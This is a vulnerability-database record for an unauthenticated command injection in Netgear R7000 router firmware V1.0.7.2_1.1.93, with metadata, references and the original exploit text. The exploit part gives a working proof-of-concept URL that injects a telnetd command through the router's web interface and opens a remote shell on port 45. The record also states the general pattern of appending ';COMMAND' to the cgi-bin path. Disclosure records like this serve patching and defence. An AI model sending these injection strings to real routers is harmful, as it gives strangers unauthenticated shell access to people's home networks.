Sign-up

ID

VAR-E-201612-0116


TITLE

Netgear R7000 - Command Injection Vulnerability

Trust: 0.6

sources: EDBNET: 89595

AFFECTED PRODUCTS

vendor:netgearmodel:r7000scope: - version: -

Trust: 0.6

sources: EDBNET: 89595

EXPLOIT

# Exploit Title: Netgear R7000 - Command Injection
# Date: 6-12-2016
# Exploit Author: Acew0rm
# Contact: https://twitter.com/Acew0rm1
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93
-Vulnerability
An unauthenticated user can inject commands threw
http://RouterIP/cgi-bin/;COMMAND.
-Proof Of Concept
http://RouterIP/;telnetd$IFS-p$IFS'45' will open telnet on port 45.

Trust: 0.6

sources: EDBNET: 89595

PRICE

free

Trust: 0.6

sources: EDBNET: 89595

TYPE

Command Injection Vulnerability

Trust: 0.6

sources: EDBNET: 89595

EXTERNAL IDS

db:0DAYTODAYid:26498

Trust: 0.6

db:EDBNETid:89595

Trust: 0.6

sources: EDBNET: 89595

REFERENCES

url:https://0day.today/exploits/26498

Trust: 0.6

sources: EDBNET: 89595

SOURCES

db:EDBNETid:89595

LAST UPDATE DATE

2022-07-27T09:15:15.352000+00:00


SOURCES RELEASE DATE

db:EDBNETid:89595date:2016-12-17T00:00:00